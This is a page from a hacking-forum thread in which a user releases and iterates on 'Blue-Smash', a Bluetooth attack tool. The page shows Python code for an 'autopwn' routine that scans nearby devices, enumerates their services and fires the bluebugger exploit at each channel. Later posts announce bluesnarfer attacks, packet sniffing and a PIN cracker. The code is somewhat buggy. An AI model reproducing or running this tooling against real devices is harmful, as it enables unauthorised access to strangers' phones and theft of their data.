Page 3 of 4 FirstFirst 1234 LastLast
Results 21 to 30 of 39

Thread: Download Blue|Smash v1.0a BETA

  1. #21
    Junior Member unix_r00ter's Avatar
    Join Date
    Feb 2007
    Posts
    64

    Default

    great work! thanks

  2. #22
    Very good friend of the forum drgr33n's Avatar
    Join Date
    Jan 2010
    Location
    Dark side of the moon ...
    Posts
    699

    Default

    Hey guys

    Sorry I haven't been around, I've just moved into my new flat over jan and have been decorating etc .

    I've now got an internet connection and I am going to start work again on blue-track, but I'm going to change the name because of a snotty email lol

    I'l will post more soon

    Cheers

    tH3 Gr33n5t3r

    Well sorry bout the last version of blue-track did it actually work? lol . Well I've changed the name to blue-smash, fixed everything that didn't work and a general tidy up. Here is the new version

    Blue-Smash v1.0a

    Looking into adding a sqlite db for autopwn etc and looking into a couple of more exploits to add.

    Enjoy

    Hey again guys

    First thing is that I've noticed yet more tyop's in my code sorry . Spent few hours testing everything and I am confident the next version will be much cleaner.

    Next is I've started work on the autopwn function. I don't think I can get this to work exactly the same as metasploits because I do not have the skill. Instead I am going to code it so it checks all blue tooth exploits to a chosen targets and prints out a report that tells you if any of the exploits were successful.

    In future version I hope to add device type and manufacturer detection for a more targeted approach. Also planning a blue tooth chat function and a blue tooth virtual keyboard :P

    I've done the scanning and profiling stuff and now working on the exploit stuff.

    Code:
    #### blue-smash autopwn ####
    try:
      import os,time,sys
      from pysqlite2 import dbapi2 as sqlite
      from bluetooth import *
    except ImportError, e:
        raise ImportError("Your system is missing some dependencies, Please read the README file.")
    
    # scan for nearby devices
    
    print "Blue-Smash Autopwn Function :p"
    print "Scanning for devices......."
    listno1 = 0
    nearby_devices = discover_devices(lookup_names = True)
    
    # create menu 
    
    for name, addr in nearby_devices:
      listno1 += (1)
      print "%s) %s - %s" % (listno1, name, addr)
      victim = raw_input ("Choose a Number....:")
    
    # create DB
    
      if victim == '%s'% (listno1):
        if os.path.exists(name):
          print "DB already exists! Removing old DB......."
          os.system("rm %s" % (name))
        print "Creating sqlite DB %s" % (name)
        con1 = sqlite.connect (name)
        c = con1.cursor()
        c.execute('''CREATE TABLE fingerprint_results (
           id INTEGER PRIMARY KEY,
           name TEXT,
           port TEXT,
           status TEXT
          )''')
        services = find_service(address=name)
        if len(services) > 0:
          print "Blue-Smash found %d services on %s" % (len(services), name)
          print
        else:
          print "Sorry no services were found on %s :("% (name)
        for svc in services:
          print "Found %s on channel/PSM %s"% (svc["name"],svc["port"]) 
          c.execute('insert into fingerprint_results values (null, ?, ?, null)', (svc["name"],svc["port"]))
          con1.commit()
        print "Exploiting %s Stand by MwHaAhaA"% (name)
      else:
        print "Error!!! Blue-Smash will now exit."
    If anybody spots anything a bit back to front or wrong let me know as I'm still learning

    UPDATE

    Sorry noticed mods keep having to squeeze my post my appologies
    Just been playing around and came up with this little script. It scan's for devices, finds all open ports, creates a DB, checks all ports to see if the device is vulnerable to the bluebugger exploit and saves this info to the DB. This is abit untidy but works :P

    Code:
    # autopwn brainstorm
    
    try:
      import os,time,sys
      from pysqlite2 import dbapi2 as sqlite
      from bluetooth import *
    except ImportError, e:
        raise ImportError("Your system is missing some dependencies, Please read the README file.")
    
    # define bluebugger test exploit
    
    def exp_bluebugger():
      print "Creating temp RFCOMM Device"
      if not os.path.exists("/dev/rfcomm0"):
        os.spawnlp(os.P_WAIT,'mknod','mknod','/dev/rfcomm0','c','216','0')
      print "Starting Bluebugger..."
      con1 = sqlite.connect (name)
      c = con1.cursor()
      c.execute("select port from fingerprint_results order by port")
      print (svc["port"])
      auto_bluebugger=os.popen("bluebugger -c %s -o bluebugger.txt -a %s info "% (svc["port"],name))
    
    # scan for devices
    
    print "Blue-Smash Autopwn Function :p"
    print "Scanning for devices......."
    listno1 = 0
    nearby_devices = discover_devices(lookup_names = True)
    for name, addr in nearby_devices:
      listno1 += (1)
      print "%s) %s - %s" % (listno1, name, addr)
      victim = raw_input ("Choose a Number....:")
    
    # Create DB 
    
      if victim == '%s'% (listno1):
        if os.path.exists(name):
          print "DB already exists! Removing old DB......."
          os.system("rm %s" % (name))
        print "Creating sqlite DB %s" % (name)
        con1 = sqlite.connect (name)
        c = con1.cursor()
        c.execute('''CREATE TABLE fingerprint_results (
           id INTEGER PRIMARY KEY,
           name TEXT,
           port TEXT,
           status TEXT
          )''')
    
    # profile device 
    
        services = find_service(address=name)
        if len(services) > 0:
          print "Blue-Smash found %d services on %s" % (len(services), name)
          print
        else:
          print "Sorry no services were found on %s :("% (name)
        fileno = 0
        for svc in services:
          fileno += (1)
          print "Found %s on channel/PSM %s"% (svc["name"],svc["port"]) 
    
    # Call exploit function
    
          exp_bluebugger()
    
    # check to see if port is vunerable & update DB
    
          vun_check = open("bluebugger.txt", "r")
          linelist = vun_check.readlines()
          vun_check.close()
          if len(linelist) > 6:
            c.execute('insert into fingerprint_results (id, name, port, status) values (null, ?, ?, ?)', (svc["name"],svc["port"], 'y'))
            con1.commit()
            print ":) is vulnerable"
          else:
            c.execute('insert into fingerprint_results (id, name, port, status) values (null, ?, ?, ?)', (svc["name"],svc["port"], 'n'))
            con1.commit()
            print ":( Not vulnerable"
          vun_check.close()
      else:
        print "Error!!!  target doesn't exist :D autopwn will now exit."
    
    # EOF Biatch :P

  3. #23
    Very good friend of the forum drgr33n's Avatar
    Join Date
    Jan 2010
    Location
    Dark side of the moon ...
    Posts
    699

    Default blue-smash v1.0b

    Hey guys

    Just finished blue-smash-v1.0b, in this version Everything works . Also added the vulnerability scanner function.

    The scanner scans for devices, fingerprints the device and try's the bluebugger and bluesnarfer exploits on all found channels. Then it prints out a report and tells you of possible vulnerable ports.

    Blue-Smash v1.0b

    Next version will be some time because I want to look into more exploits and possible new exploits Also want to start learning C. But it should include the bluetooth chat and hid keyboard function.

  4. #24
    Member s1lang's Avatar
    Join Date
    Sep 2007
    Posts
    189

    Default

    Thank you

    I will definately be trying this 2moro on my old phones

  5. #25
    Very good friend of the forum drgr33n's Avatar
    Join Date
    Jan 2010
    Location
    Dark side of the moon ...
    Posts
    699

    Default Linux bluetooth sniffing

    Hey guys

    After alot of sniffing around and reading white papers I have found a POC sniffing script for the frontline drivers. I've tinkered with it abit and got it work work on my modified csr bluetooth dongle

    I have successfully sniffed and stored packets Only about 3 lol so looks very promising.

    Now going to have a bit more of a tinker then going to add it to blue-smash hehehe and also included in the script is a pin cracker mwahahaha

    now we are on the way to bluetooth sniffing in *nux for less

  6. #26
    Very good friend of the forum drgr33n's Avatar
    Join Date
    Jan 2010
    Location
    Dark side of the moon ...
    Posts
    699

    Default Blue-Smash v1.0c

    Hey Guys

    Well here it is Blue-Smash v1.0c with its fully functional sniffing function . You will have to have a modified & Calibrated csr bluetooth dongle like described in my bluetooth tutorial.

    I've been testing and sniffing all afternoon and looks all good .All you need is the master's MAC and one of the slave's and you are good to go.

    Click below to download....

    Blue_Smash v1.0c

    Bluetooth Sniffing with Blue-Smash Video Tutorial / Demo

    Online Demo Vid (No Sound)

    Enjoy

  7. #27
    Member s1lang's Avatar
    Join Date
    Sep 2007
    Posts
    189

    Default

    thanks mate

  8. #28
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    13

    Default

    I am getting install error
    anyone else having this problem?
    Thanks
    Ralhaz

  9. #29
    Very good friend of the forum drgr33n's Avatar
    Join Date
    Jan 2010
    Location
    Dark side of the moon ...
    Posts
    699

    Default

    Hey Ralhaz

    I haven't come across no installation errors yet? Also had 400 downloads and no ones moaned yet

    Whats the error message?

    Many Thanks

    Drgr33n

  10. #30
    Jenkem Addict imported_wyze's Avatar
    Join Date
    Jul 2007
    Posts
    1,543

    Default

    Quote Originally Posted by Ralhaz View Post
    I am getting install error
    anyone else having this problem?
    Thanks
    Ralhaz
    Might be useful to post the error...
    dd if=/dev/swc666 of=/dev/wyze

Page 3 of 4 FirstFirst 1234 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •